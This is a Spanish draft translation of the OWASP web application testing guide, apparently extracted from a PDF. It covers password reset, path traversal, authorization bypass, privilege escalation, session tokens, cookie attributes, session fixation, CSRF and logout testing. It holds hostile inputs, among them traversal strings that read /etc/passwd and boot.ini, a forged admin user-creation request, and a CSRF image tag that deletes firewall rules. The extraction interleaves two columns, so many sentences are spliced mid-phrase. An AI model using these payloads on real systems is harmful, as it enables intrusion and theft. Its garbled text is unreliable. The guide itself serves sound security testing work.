•¿ Son las contraseñas de restablecimiento generadas al azar?
[3] Si el cambio de contraseña o reinicio del proceso es vulnerable a CSRF.
El primer paso es comprobar si se requieren preguntas secretas. El envío • ¿La función de restablecimiento de contraseña solicita confirmación antes de
de la contraseña (o un enlace de restablecimiento de contraseña) a la cambiar la contraseña?
dirección de correo electrónico del usuario, sin preguntar primero una
pregunta secreta, es confiar 100% en la seguridad de la dirección de
correo electrónico, que no es conveniente si la aplicación necesita un alto
nivel de seguridad.
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
115
Guia de pruebas 4.0 "Borrador"
• ¿ La contraseña anterior es solicitada para completar el cambio? • Sitio web de accesibilidad optimizada
El escenario más inseguro aquí es si la aplicación permite el cambio de la • Sitios web paralelos que utilizan el mismo usuario (por ejemplo, otra página
contraseña sin solicitar la contraseña actual. De hecho, si un atacante es web que ofrece diferentes funcionalidades de la misma organización, un sitio
capaz de tomar el control de una sesión válida, podría cambiar fácilmente web de un socio con el que se comparten cuentas de usuario)
la contraseña de la víctima.
• Desarrollo, prueba, UAT y puesta en escena de las versiones de la página
web estándar
• OWASP Periodic Table of Vulnerabilities - Insufficient Password Recovery • Operadores de centros de llamadas (call center)
https://www.example.com/myaccount/
Reestablecer Si Si -
Cómo probar
contraseña
Revise y pruebe
Los canales alternativos deben mencionarse en el informe de prueba, Tradicionalmente, los servidores web y aplicaciones web implementan
incluso si están marcados como "solo informativos" y/o "fuera del mecanismos de autenticación para controlar el acceso a archivos y
alcance". En algunos casos, el alcance de la prueba podría incluir el canal recursos. Los servidores web tratan de limitar los archivos de los
alternativo (por ejemplo, porque es una ruta en el nombre del usuarios dentro de un "directorio raíz" o "raíz del documento web ", que
alojamiento de destino), o pueden añadirse al ámbito después de la representa un directorio físico en el sistema de archivos. Los usuarios
discusión con los dueños de los canales. Si la prueba se permite y deben considerar este directorio como el directorio base en la estructura
autoriza, entonces todas las otras pruebas de autenticación en esta guía jerárquica de la aplicación web.
deben realizarse y compararse con el canal primario.
Remediación
Asegúrese de que se aplique una política de autenticación consistente en Muchas aplicaciones web utilizan secuencias de comandos de servidor
todos los canales para que sean igualmente seguros. para incluir diferentes tipos de archivos. Es muy común utilizar este
método para administrar imágenes, plantillas, cargar textos estáticos y
así sucesivamente. Desafortunadamente, estas aplicaciones exponen las
vulnerabilidades de seguridad si los parámetros de entrada (es decir,
Cómo probar la autorización parámetros de los formularios, valores de cookies) no son validados
correctamente.
Autorización es el concepto de permitir acceso a los recursos, sólo a
aquellos permitidos para utilizarlos. Probando la autorización significa
comprender cómo funciona el proceso de autorización y usar esa
información para eludir el mecanismo de autorización. En servidores web y aplicaciones web, este tipo de problemas se presenta
en ataques path de inclusión de archivos de circulación. Mediante la
explotación de este tipo de vulnerabilidad, un atacante es capaz de leer
directorios o archivos que normalmente no puede leer, acceder a los
La autorización es un proceso que viene después de una autenticación
datos fuera de la raíz de documentos web o incluir secuencias de
correcta, por lo que el evaluador verifica este punto después de tener
comandos y otros tipos de archivos desde sitios web externos.
credenciales válidas, asociadas a un conjunto bien definido de roles y
privilegios. En este tipo de evaluación, se debe verificar si es posible
eludir el esquema de autorización, encontrando una vulnerabilidad de
ruta de circulación, o encontrar maneras de aumentar los privilegios Para el propósito de la guía de pruebas OWASP, sólo las amenazas de
asignados al evaluador. seguridad relacionadas con aplicaciones web se considerarán y no las
amenazas a servidores web (por ejemplo, la infame "%5 escape c code"
en el servidor web IIS de Microsoft). Más sugerencias de lectura se
proveerán en la sección de referencias para los lectores interesados.
Probar la inclusión de archivos de directorio de circulación(OTG-
AUTHZ-001)
Resumen
Este tipo de ataque es también conocido como el ataque de punto-punto-
slash (dot-dot-slash) (... /), salto de directorio, escalada de directorio o
Muchas aplicaciones web usan y administran archivos como parte de su
retroceso.
operación diaria. Usando métodos de validación de entrada que no han
sido bien diseñados o implementados, un agresor podría aprovechar el
sistema para leer o escribir archivos que no están diseñados para ser
accesibles. En situaciones particulares, podría ser posible ejecutar un
código arbitrario o comandos del sistema.
TEMPLATE=flower
(a) Enumeración de Vectores de Entrada (una evaluación sistemática de
cada vector de entrada)
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
(b) Técnicas de Pruebas (una evaluación metódica de cada técnica de
ataque, utilizada por un atacante para explotar la vulnerabilidad)
Técnicas de pruebas
Cómo probar
La siguiente etapa de la prueba es analizar las funciones de validación de
Prueba de Caja Negra entrada presentes en la aplicación web. Usando el ejemplo anterior, la
página dinámica llamada getUserProfile.jsp carga información estática de
Enumeración de vectores de entrada un archivo y muestra el contenido a los usuarios. Un atacante podría
insertar la cadena maliciosa "... /.. /.. /.. / etc/passwd" para incluir el
Con el fin de determinar qué parte de la aplicación es vulnerable a eludir archivo de contraseñas hash de un sistema Linux/UNIX. Obviamente, este
la validación de entrada, el evaluador debe enumerar todas las partes de tipo de ataque sólo es posible si el punto de control de validación falla.
la aplicación que aceptan el contenido por parte del usuario. Esto también Según los privilegios de sistema de archivos, la aplicación web debe ser
incluye consultas HTTP GET y POST y opciones comunes como carga de capaz de leer el archivo.
archivos y formularios HTML.
http://example.com/index.php?file=content
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
http://example.com/main.cgi?home=index.htm
directory separator: “:
El siguiente ejemplo demostrará cómo es posible mostrar el código fuente Debemos tomar en cuenta los mecanismos de codificación de los
de un componente CGI, sin utilizar los caracteres de ruta de circulación. siguientes caracteres:
http://example.com/main.cgi?home=main.cgi
• URL encoding and double URL encoding
Sugerencia: Es un error común de los programadores no esperar todas %252e%252e%255c represents ..\
las formas de codificación y, por lo tanto, solo hacer validación de
contenido codificado básico. Si al principio la secuencia de la prueba no es ..%255c represents ..\ and so on.
exitosa, pruebe con otro esquema de codificación.
• Marcadores extraños del directorio parental con elementos arbitrarios que • Puede ser equivalente a una letra de unidad como c:\, o incluso a un
pueden o no existir volumen de disco sin una letra asignada.
\\.\GLOBALROOT\Device\HarddiskVolume1\
Ejemplos:
– file.txt
– file.txt...
• Se refiere a la primera unidad de disco en la máquina.
– file.txt<spaces>
– file.txt”””” \\.\CdRom0\
– file.txt<<<>>><
– ./././file.txt
\\?\server_or_ip\path\to\file.abc
lang:php (include|require)(_once)?\s*[‘”(]?\s*\$_(GET|POST|COOKIE)
• Windows NT Device Namespace: Se utiliza para referirse al espacio de
nombres de dispositivo de Windows. Ciertas referencias permiten el acceso
a sistemas de archivos utilizando una ruta diferente.
code.google.com
Usando el método de pruebas de Caja Gris, es posible descubrir las • Web Proxy (Burp Suite[2], Paros[3], WebScarab[4],
vulnerabilidades que son generalmente más difíciles de hallar, o incluso
imposibles de encontrar durante una evaluación estándar de la Caja OWASP: Zed Attack Proxy (ZAP)[5])
Negra.
• Enconding/Decoding tools
file=....//....//boot.ini
Pruebas para eludir el esquema de autorización (OTG-AUTHZ-002)
file=....\\....\\boot.ini
Resumen
file= ..\..\boot.ini
Este tipo de prueba se centra en comprobar cómo se implementó el
esquema de autorización para que cada rol o privilegio obtenga acceso a
funciones reservadas y recursos.
Herramientas
Para cada rol específico que el evaluador tiene durante la evaluación, para
• DotDotPwn - The Directory Traversal Fuzzer:
cada función y solicitud que la aplicación ejecuta durante la fase posterior
dotdotpwn.sectester.net a la autenticación, es necesario verificar:
• ¿Es posible acceder a ese recurso, incluso si el usuario no está ¿Qué sucede si un usuario no administrativo intenta ejecutar esa
autenticado? petición? ¿Se creará el usuario? Si es así, ¿puede utilizar sus privilegios
del nuevo usuario?
• ¿Es posible tener acceso a ese recurso después de la desconexión?
• ¿Es posible acceder a las funciones y los recursos que deben ser accesibles
a un usuario que tiene un rol diferente o un privilegio? Pruebas para buscar el acceso a los recursos asignados a un rol
diferente
Cómo probar
Pruebas para buscar el acceso a funciones administrativas Pruebas para determinar el escalamiento de privilegios (OTG-AUTHZ-
003)
Por ejemplo, suponga que la función 'AddUser.jsp' es parte del menú
administrativo de la aplicación, y es posible acceder a él al solicitar la Resumen
siguiente URL:
Esta sección describe el problema del escalamiento de privilegios de una
etapa a otra. Durante esta fase, el evaluador deberá verificar que no es
https://www.example.com/admin/addUser.jsp posible para un usuario modificar sus privilegios o roles dentro de la
aplicación, de manera que podría permitir ataques de escalada de
privilegios.
HTTP/1.1 200 OK
Generalmente, las personas se refieren al escalamiento vertical cuando es
Server: Netscape-Enterprise/6.0
posible tener acceso a recursos en cuentas más privilegiadas (por
ejemplo, adquirir privilegios administrativos para la aplicación) y en
Date: Wed, 1 Apr 2006 13:51:20 GMT
escalamiento horizontal cuando es posible acceder a los recursos de una
cuenta configurada de manera similar (por ejemplo, en una aplicación de
Set-Cookie: USER=aW78ryrGrTWs4MnOd32Fs51yDqp; path=/;
banca en línea, al acceder a la información relacionada con un usuario
domain=www.example.com
diferente).
Set-Cookie: SESSION=k+KmKeHXTgDi1J5fT7Zz; path=/; domain=
www.example.com
POST /admin/addUser.jsp HTTP/1.1 ¿Qué pasa si el evaluador modifica el valor de la variable "profile" en
"SysAdmin"? ¿Es posible llegar a ser administrador?
Host: www.example.com
userID=fakeuser&role=3&group=grp001
Por ejemplo:
Por ejemplo:
Cómo probar
Tools
• OWASP WebScarab: OWASP WebScarab Project A continuación se muestran varios escenarios típicos para esta
vulnerabilidad y los métodos de prueba para cada uno:
• OWASP Zed Attack Proxy (ZAP)
Las Referencias de Objetos Directos Inseguros permiten a los atacantes En este caso, el valor del parámetro de la factura se utiliza como un índice
omitir la autorización y acceder a los recursos modificando directamente en una tabla de facturas en la base de datos. La aplicación toma el valor de
Solicitud de muestra:
El valor de un parámetro se utiliza directamente para acceder a la
funcionalidad de la aplicación
http://foo.bar/changepassword?user=someuser
solicitud de muestra
http://foo.bar/accessPage?menuitem=12
Referencias
OWASP Top 10 2013-A4-Insecure Direct Object References atacante que es capaz de predecir y falsificar una cookie débil, fácilmente
puede secuestrar las sesiones de usuarios legítimos.
• Manipulación de cookies: falsificar una cookie válida para llevar a cabo el ataque. Navegue por la aplicación. Note cuándo se crean las cookies. Haga una
Este último paso podría requerir un gran número de intentos, dependiendo de cómo lista de las cookies recibidas, la página que las establece (con la directiva
la cookie haya sido creada (ataque de fuerza bruta de cookie). set-cookie), el dominio para el cual son válidas, su valor y sus
características.
Cómo probar
¿Qué eventos modificaron la cookie?
Prueba de Caja Negra y ejemplos
• ¿Son las cookies que se esperan sean transitorias configuradas como tal? Análisis de la sesión
• ¿ ué ajustes HTTP/1.1 Cache-Control se utilizan para proteger las cookies? Las fichas (tokens) de sesión (cookies, ID de la sesión o campo oculto)
deben ser examinadas para asegurar su calidad desde una perspectiva de
• ¿ ué ajustes HTTP/1.0 Cache-Control se utilizan para proteger las cookies? seguridad. Deben ser evaluadas según criterios como su aleatoriedad,
singularidad, resistencia al análisis estadístico y criptográfico y fuga de
información.
Colección de cookies
El primer paso requerido para manipular una cookie es entender cómo la Estructura de los indicadores y fuga de información
aplicación crea y gestiona las cookies. Para esta tarea, los evaluadores
tienen que intentar contestar las siguientes preguntas: La primera etapa es examinar la estructura y el contenido de un
Identificador de Sesión proporcionada por la aplicación. Un error común
es incluir datos específicos en el indicador, en lugar de emitir un valor
genérico y hacer referencia a datos reales en el lado del servidor.
• ¿Cuántas cookies son utilizadas por la aplicación?
Una vez identificado el tipo de ofuscación, es posible descifrar los datos • ¿ ué patrones obvios están presentes en el identificador de sesión como un
originales. En la mayoría de los casos, sin embargo, esto es improbable. todo o en porciones individuales?
De todas formas, puede ser útil enumerar la codificación en el sitio desde
el formato del mensaje. Además, si se deduce la técnica del formato y de
la ofuscación, podrían realizarse ataques de fuerza bruta automatizados.
Previsibilidad y aleatoriedad del identificador de sesión
El análisis de las zonas variables (si las hay) del identificador de sesión
Las fichas hibridas pueden incluir información como dirección IP o ID de deberían realizarse para establecer la existencia de cualquier patrón
usuario junto con una porción codificada, como los siguientes: reconocible o predecible. Estos análisis pueden ser realizados
manualmente y con herramientas diseñadas a la medida u OTS
estadísticas o de criptoanálisis para deducir cualquier patrón en el
owaspuser:192.168.100.1: contenido del identificador de sesión. Los controles manuales deberían
incluir comparaciones del identificador de sesión emitidas con las
a7656fafe94dae72b1e1487670148412 mismas condiciones del inicio de sesión; por ejemplo, el mismo nombre
de usuario, contraseña y dirección IP.
absoluto o relativo, deben ser investigados. Muchos sistemas utilizan al sesión). Para hacer una cookie impredecible, pueden utilizarse valores
tiempo como una semilla para sus elementos seudoaleatorios. aleatorios o criptografía.
[1] Imprevisibilidad: una cookie debe contener cierta cantidad de datos El tiempo registrado podría ser la hora local o la marca de tiempo del
dificiles de adivinar. Mientras más difícil sea falsificar una cookie válida, servidor incluido en la respuesta HTTP (o ambos).
más difícil será entrar en la sesión de un usuario legítimo. Si un atacante
puede adivinar la cookie utilizada en una sesión activa de un usuario
legítimo, podrán suplantar totalmente a ese usuario (secuestro de
Un identificador de sesión largo (o más bien uno con una gran cantidad
de varianza) y un período de validez más corto, haria mucho más difícil
Un ejemplo de una cookie estructurada fácil de ubicar es el siguiente: tener éxito en un ataque de fuerza bruta.
ID=5a0acfc7ffeb919:CR=1:TM=1120514521:LM=11205145
• ¿Cuánto tiempo tomaría un ataque de fuerza bruta en todos los posibles
21:S=j3am5KzC4v01ba3q identificadores de sesión?
Este ejemplo muestra cinco campos diferentes, que llevan diferentes • ¿El retraso entre los intentos de conexión con diferentes identificadores de
tipos de información: sesión mitigan el riesgo de este ataque?
ID – hexadecimal
Pruebas de Caja Gris
CR – entero pequeño
Si el evaluador tiene acceso al esquema de gestión de sesión de la
TM y LM – entero grande ( y curiosamente tienen el mismo valor. aplicación, puede comprobar lo siguiente:
Vale la pena ver lo que ocurre al modificar uno de ellos).
S – alfanumérico
• Sesión con una ficha al azar
El identificador de sesión debe tener una longitud de al menos 50 • Darrin Barrall: “Automated Cookie Analysis”: rmccurdy.com
caracteres.
• ENT: fourmilab.ch
• seclists.org
• Duración de la sesión
• Gunter Ollmann: “Web Based Session Management” - technicalinfo.net
La ficha de sesión debe tener una duración definida (que depende de la
criticidad de los datos de la aplicación administrada). • Matteo Meucci:”MMS Spoofing”: owasp.org
• HTTPOnly (no legible mediante un script): Descripción de las vulnerabilidades en la gestión de sesión
Set Cookie: cookie=data; path=/; domain=.aaa.it; HTTPOnly Vea los artículos sobre vulnerabilidades en la gestión de la sesión OWASP.
Mas información aquí: Probando los atributos de las cookies Descripción de las defensas de la gestión de sesión
Herramientas
• OWASP Zed Attack Proxy Project (ZAP): owasp.org - features a session Cómo evitar las vulnerabilidades de la gestión de sesión
token analysis mechanism.
Vea los artículos sobre cómo evitar las vulnerabilidades de la gestión de
• Burp Sequencer: portswigger.net sesión de OWASP.
• YEHG’s JHijack: owasp.org Cómo revisar el código en busca de vulnerabilidades en la gestión de sesión
Libros Blancos
Pruebas de los atributos de las cookies (OTG-SESS-002)
• RFC 2965 “HTTP State Management Mechanism”
Resumen
• RFC 1750 “Randomness Recommendations for Security”
Las cookies son a menudo un vector de ataque clave para usuarios
• Michal Zalewski: “Strange Attractors and TCP/IP Sequence Number maliciosos (normalmente dirigidas hacia otros usuarios) y la aplicación
Analysis” (2001): lcamtuf.coredump.cx siempre debe tomar las debidas diligencias para proteger las cookies. Esta
sección examina cómo una aplicación puede tomar las precauciones
• Michal Zalewski: “Strange Attractors and TCP/IP Sequence Number necesarias al asignar las cookies y cómo se prueba que estos atributos se
Analysis - One Year Later” (2002): lcamtuf.coredump.cx han configurado correctamente.
• Dominio - este atributo se utiliza para comparar contra el dominio del servidor
en el que se solicita la dirección URL. Si el dominio coincide o si es un
Mientras un usuario añade varios elementos a un carro de compras, estos subdominio, entonces el atributo de ruta de acceso se comprobará a
datos deben conservarse en las solicitudes posteriores a la aplicación. Las continuación.
cookies son muy utilizadas para esta tarea y son configuradas por la
aplicación utilizando la directiva Set-Cookie en la respuesta HTTP de la
aplicación y está generalmente en un formato name=value (si las cookies
Note que sólo los hosts dentro del dominio especificado pueden
se encuentran activadas y si son compatibles, como es el caso para todos
establecer una cookie para ese dominio. También note que el atributo del
los navegadores modernos). Una vez que una aplicación le ha dicho al
dominio no puede ser un dominio de nivel superior (como .gov o .com)
navegador que utilice una cookie determinada, el navegador enviará esta
para evitar que los servidores configuren arbitrariamente cookies para
cookie en cada solicitud subsiguiente. Una cookie puede contener datos
otro dominio. Si no se establece el atributo de dominio, el nombre del
tales como los elementos de un carro de compras en línea, el precio de
servidor host que genera la cookie se utiliza como el valor por defecto del
estos artículos, la cantidad de estos artículos, información personal,
dominio.
identificador de usuarios, etc.
ligeramente (por ejemplo midominio.com), entonces el servidor permitiría a un atacante utilizar un servidor vulnerable en el dominio para
vulnerable podría ser utilizado para cosechar las cookies (como las fichas cosechar la cookie del usuario a través de una vulnerabilidad como XSS.
de sesión).
• Atributo de Ruta - Verifique que el atributo de ruta, así como el atributo del
dominio, no han sido establecidos muy libremente. Incluso si el atributo del
dominio ha sido configurado tan firmemente como es posible, si la ruta de
• Ruta (path) - Además del dominio, la ruta de la URL en la que la cookie es acceso se establece hacia el directorio raíz "/" entonces puede ser vulnerable a
válida puede especificarse. Si coincide el dominio y la ruta, la cookie se aplicaciones menos seguras en el mismo servidor. Por ejemplo, si la aplicación
enviará en la solicitud. Al igual que con el atributo de dominio, si se reside en /myapp/, compruebe que la ruta de cookies está ajustada a
establece el atributo de ruta de acceso muy ligeramente, entonces podría ";path=/myapp/" y no a ";path =/" o ";path =/myapp". Note aquí que el ruteador
dejar a la aplicación vulnerable a los ataques de otras aplicaciones en el "/" debe ser utilizado después de myapp. Si no se utiliza, el navegador enviará la
mismo servidor. cookie a cualquier ruta que coincida con "myapp", tal como "myapp-exploited".
Por ejemplo, si el atributo de la ruta de acceso se establece en la raíz del • Atributo de Caducidad - Si este atributo se establece en un momento en el
servidor web "/", entonces se enviarán las cookies de la aplicación para cada futuro, verifique que la cookie no contenga ninguna información sensible. Por
aplicación dentro del mismo dominio. ejemplo, si una cookie se establece en “; expires=Sun, 31-Jul-2016 13:45:29
GMT” y actualmente es 31 de julio de 2014, entonces el evaluador debe
• caduca (expires) - este atributo se utiliza para configurar cookies inspeccionar la cookie. Si la cookie es una ficha de sesión que se almacena en el
persistentes, puesto que la cookie no caduca hasta que se supera la fecha disco duro del usuario, entonces un atacante o un usuario local (como un
establecida. Esta cookie persistente se utilizará en esta sesión y en sesiones administrador) que tiene acceso a esta cookie puede acceder a la aplicación
posteriores hasta que la cookie caduque. Una vez que ha superado la fecha reenviando esta ficha hasta que pase la fecha de caducidad.
de caducidad, el navegador borrará la cookie. Alternativamente, si no se
establece este atributo, entonces la cookie sólo es válida en la sesión actual
del navegador y la cookie se eliminará cuando finalice la sesión.
Herramientas
Intercepting Proxy:
Cómo probar
• OWASP Zed Attack Proxy Project
Prueba de Caja Negra
• Atributo seguro - cada vez que una cookie contiene información sensible o es
una ficha de sesión, siempre debe ser pasada mediante un túnel encriptado. Por Referencias
ejemplo, después de iniciar la sesión en una aplicación y haber establecido una
Libros Blancos
ficha de sesión mediante una cookie, verifique si está etiquetada con una bandera
de "seguridad";. Si no es así, entonces el navegador estará de acuerdo en pasar a
• RFC 2965 - HTTP State Management Mechanism: tools.ietf.org
través de un canal sin encriptar, usando HTTP, y esto podría permitir a un
atacante dirigir a los usuarios a enviar sus cookies por un canal inseguro.
• RFC 2616 - Hypertext Transfer Protocol - HTTP 1.1: tools.ietf.org
• Atributo HttpOnly - Este atributo debería fijarse siempre, a pesar de que no
• The important “expires” attribute of Set-Cookie
todos los navegadores lo soportan. Este atributo ayuda a proteger la cookie del
http://seckb.yehg.net/2012/02/important-expires-attribute-of-set.html
acceso de un script del lado del cliente, no elimina el riesgo de scripts de sitios
cruzados, pero elimina algunos vectores de explotación. Verifique si la etiqueta
• HttpOnly Session ID in URL and Page Body
"HttpOnly" ha sido fijada.
http://seckb.yehg.net/2012/06/httponly-session-id-in-url-and-page.html
Set-Cookie: JSESSIONID=0000d8eyYq3L0z2fgq10m4v-rt4:-1;
Path=/; secure
Las vulnerabilidades de fijación de sesión ocurren cuando:
Cache-Control: no-cache=”set-cookie,set-cookie2”
Cómo probar
GET www.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.16) Server: Apache/2.2.2 (Fedora)
Gecko/20080702 Firefox/2.0.0.16
X-Powered-By: PHP/5.1.6
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain; Content-language: en
q=0.8,image/png,*/*;q=0.5
Cache-Control: private, must-revalidate, max-age=0
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
X-Content-Encoding: gzip
Accept-Encoding: gzip,deflate
Content-length: 4090
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Keep-Alive: 300
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
...
Referer: http://www.example.com
HTML data
Cookie: JSESSIONID=0000d8eyYq3L0z2fgq10m4v-rt4:-1
Content-Type: application/x-www-form-urlencoded
Como ninguna cookie nueva ha sido emitida tras una autenticación
Content-length: 57
exitosa, el evaluador sabe que es posible realizar un secuestro de sesión.
Name=Meucci&wpPassword=secret!&wpLoginattempt=Log+in
Resultado esperado: El evaluador puede enviar un identificador de sesión
válido a un usuario (posiblemente usando un truco de ingeniería social),
esperar a que él se autentique y verificar posteriormente que los
privilegios han sido asignados a esta cookie.
El evaluador observa la siguiente respuesta del servidor:
Herramientas
Resultado esperado:
• Protocol used (e.g., HTTP vs. HTTPS) Cada vez que la autenticación es exitosa, el usuario debe esperar recibir:
• HTTP Headers
• Message Body (e.g., POST or page content) • Una ficha de sesión diferente
• Una ficha enviada a traves de un canal encriptado cada vez que se hace una
solicitud HTTP
Cada vez que los datos del identificador de sesión pasan entre el cliente y
el servidor, el protocolo, caché, las directivas y cuerpo de privacidad
deben ser revisadas. La seguridad del transporte se refiere a la
Para probar las vulnerabilidades de proxys y caché
circulación del identificador de sesión por peticiones GET o POST, cuerpo
de los mensajes u otros medios, mediante solicitudes HTTP válidas.
Los proxys también debe considerarse al revisar la seguridad de las
aplicaciones. En muchos casos, los clientes accederán a la aplicación a
través del ISPcorporativo y los proxies o gateways conscientes del
Cómo probar protocolo, (por ejemplo, Firewalls). El protocolo HTTP proporciona
Todo código del lado del servidor que recibe datos de solicitudes POST
En general, el identificador de sesión nunca debe ser enviado mediante debe ser analizado para asegurarse que no acepte los datos si se envía
un transporte no encriptado y no debe almacenarse en caché. La como una solicitud GET. Por ejemplo, considere la siguiente petición
aplicación debe ser examinada para asegurarse que las comunicaciones POST, generada por una página de registro.
encriptadas sean tanto la norma como el que sean reforzadas para
cualquier transferencia de identificadores de sesión. Además, cada vez
POST https://owaspapp.com/login.asp HTTP/1.1
que se pasa el identificador de sesión, las directivas deben estar colocadas
para evitar su almacenamiento en caché por cachés intermedios e incluso
Host: owaspapp.com
locales.
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.2)
Gecko/20030208 Netscape/7.02 Paros/3.0.2b
La aplicación debe configurarse también para asegurar los datos en Accept: */*
caché, tanto en HTTP/1.0 y HTTP/1.1 – RFC 2616 discute los controles
adecuados en cuanto a HTTP. HTTP/1.1 proporcionando una serie de Accept-Language: en-us, en
mecanismos de control de caché. Control-Cache: no-cache indica que un
proxy no debe volver a utilizar los datos. Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66
Keep-Alive: 300
Whilst Cache-Control: Private parece ser una directiva adecuada. Esto Cookie: ASPSESSIONIDABCDEFG=ASKLJDLKJRELKHJG
permite a un proxy no compartido acceder a los datos del caché. En el
caso de café net u otros sistemas compartidos, esto presenta un riesgo Cache-Control: max-age=0
evidente. Incluso con estaciones de trabajo monousuario, el identificador
de sesión almacenada en caché puede quedar expuesto si el sistema de Content-Type: application/x-www-form-urlencoded
archivos se encuentra comprometido o si se utilizan cadenas de tiendas.
Los Cachés de HTTP/1.0 no reconocen la directiva de Cache-Control: no- Content-Length: 34
cache.
Login=Username&password=Password&SessionID=12345678
Resultado esperado:
• ¿Cómo se transfieren los identificadores de sesión, por ejemplo, GET, [3] La gestión de sesión de la aplicación basada únicamente en la
POST, Form Field(incluyendo campos ocultos)? información que es conocida por el navegador;
• ¿Son los identificadores de sesión enviados siempre a través de [4] La existencia de etiquetas HTML cuya presencia permite un acceso
transporte encriptado por defecto? inmediato a un recurso http[s]; por ejemplo, la etiqueta de imagen img.
• RFC 2616 - Hypertext Transfer Protocol - HTTP/1.1: ietf.org Punto 2) Si la aplicación no hace uso de la información relacionada con la
sesión en las URL, entonces significa que las URL de la aplicación, sus
parámetros y valores legítimos pueden identificarse (ya sea por el
análisis de código o accediendo a la aplicación y tomando nota de los
Pruebas de un CSRF (OTG-SESS-005)
formularios y direcciones URL incrustadas en el HTML/JavaScript).
Resumen
<html><body>
...
...
• por el usuario, que está utilizando la aplicación web misma;
conocida por el atacante y, por lo tanto, sea imposible la identificación de configuración si el usuario introduce '*' (una característica peligrosa,
esas URL. pero que hará que el ejemplo sea más interesante). La página de
eliminación se muestra a continuación. Supongamos que el formulario –
por simplicidad – emite una solicitud GET, que tendrá la forma:
Las cosas pueden ofuscarse más mediante la referencia de la imagen (para eliminar la regla número uno)
aparentemente válida de la URL como:
https://[target]/fwmgt/delete?rule=*
<img src=”https://[attacker]/picture.gif” width=”0” height=”0”>
Escenario de ejemplo
con el efecto de eliminar todas las reglas del firewall (y terminar en una
situación posiblemente inconveniente).
Cómo probar
Para una prueba de Caja Negra, el evaluador debe conocer las direcciones
URL en el área restringida (autenticada). Si poseen credenciales válidas,
pueden asumir ambos roles – el de agresor y el de víctima. En este caso,
los evaluadores saben las URL a probar solo con hojear alrededor de la
aplicación.
• Construya una página html que contenga la solicitud http que hace referencia
a la URL 'u' (especificando todos los parámetros relevantes; en el caso de una
En todos estos casos, si el usuario tiene iniciada una sesión en la
solicitud http GET esto es directo, mientras que para una solicitud POST
aplicación de administración del firewall, la petición tendrá éxito y
necesita recurrir a algunos Javascript);
modificará la configuración del firewall. Uno puede imaginar los ataques
contra aplicaciones sensibles y lograr hacer pujas u ofertas en subastas • Asegúrese de que el usuario se encuentra registrado en la aplicación;
automáticas, transferencias de dinero, órdenes, cambiar la configuración
de componentes de software crítico, etc. • Induzca al usuario a seguir el enlace apuntando a la URL a probar (involucre
ingeniería social si usted no puede suplantar al usuario);
Los recursos accesibles a través de peticiones HTTP GET son fácilmente • No utilice el mismo navegador para acceder a aplicaciones sensibles y
vulnerables, aunque las peticiones POST se pueden automatizar vía para navegar libremente por Internet. Si es necesario, haga ambas cosas
Javascript y son vulnerables también, por lo tanto, el uso exclusivo de en la misma máquina y con distintos navegadores.
solicitudes POST no es suficiente para corregir la aparición de
vulnerabilidades CSRF.
Referencias
Otras defensas, mientras no resuelvan el problema, contribuyen a hacer
Libros Blancos
más difícil la explotación:
Vea la guía de revisión de código de OWASP sobre cómo Revisar las A los usuarios de navegadores web a menudo no les importa que una
vulnerabilidades CSRF. aplicación está todavía abierta y simplemente cierran el navegador o la
pestaña. Una aplicación web debe considerar este comportamiento y
terminar la sesión automáticamente del lado del servidor después de un
tiempo definido.
Cómo prevenir vulnerabilidades CSRF
Resumen
El cierre de sesión es una parte importante del ciclo de vida de la sesión. Navegar de vuelta hacia el portal SSO ofrece al usuario la posibilidad de
Reducir al mínimo la vida útil de las fichas de sesión disminuye la volver a iniciar una sesión en la aplicación donde la sesión fue terminada
probabilidad de un ataque de secuestro de sesión exitoso. Esto puede poco antes. Por otro lado, una función de registro en un sistema SSO no
verse como un control contra la prevención de otros ataques como el necesariamente causa el cierre de sesión en las aplicaciones
Cross Site Scripting (CSS) o Cross Site Request Forgery (CSRF). Se conoce interconectadas.
que este tipo de ataques dependen de que un usuario tenga una sesión
autenticada en ese momento. No tener una terminación de sesión segura
sólo aumenta la superficie de ataque para cualquiera de estos ataques.
Cómo probar
Hay múltiples cuestiones que pueden prevenir la terminación eficaz de • Un botón de cierre de sesión está presente en todas las páginas de la
una sesión. Para la seguridad ideal de la aplicación web, un usuario debe aplicación web.
ser capaz de terminar en cualquier momento a través de la interfaz de
usuario. Cada página debe contener un botón de cierre de sesión en un • El botón de cierre de sesión debe ser rápidamente identificable por un
lugar directamente visible. Las funciones de cierre de sesión confusas o usuario que quiere desconectarse de la aplicación web.
ambiguas podrían causar desconfianza en el usuario sobre dicha
funcionalidad. • Después de cargar una página, el botón de cierre de sesión debe ser visible
sin desplazamiento.
Otro error común en la terminación de la sesión es que en la ficha de
sesión del cliente se establece un nuevo valor, mientras que en el estado • Idealmente, el botón de cierre de sesión debe ubicarse en una zona fija
del servidor permanece activa y puede ser reutilizada restableciendo la dentro de la pantalla visible del navegador y no debe verse afectada por el
cookie de sesión al valor anterior. A veces sólo se muestra un mensaje de desplazamiento del contenido.
confirmación al usuario sin que tenga que realizar ninguna acción
adicional. Esto debe evitarse.
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
144
Guia de pruebas 4.0 "Borrador"
Para probar el cierre de sesión desde el servidor: El valor apropiado para el tiempo de caducidad de la sesión depende del
propósito de la aplicación y debe ser un equilibrio entre seguridad y
Primeramente, almacene los valores de las cookies que se utilizan para usabilidad. En las aplicaciones bancarias, no tiene sentido mantener una
identificar una sesión. Invoque la función de cierre de sesión del usuario y sesión inactiva más de quince minutos. Por otro lado, un tiempo corto de
observe el comportamiento de la aplicación, especialmente en relación espera en un wiki o un foro podría molestar a los usuarios que están
con las cookies de sesión. Intente navegar hacia una página que sólo es escribiendo artículos largos con solicitudes de registro innecesarias. Allí,
visible dentro de una sesión autenticada, por ejemplo, el uso del botón de los tiempos de espera de una hora o más pueden ser aceptables.
regresar del navegador.
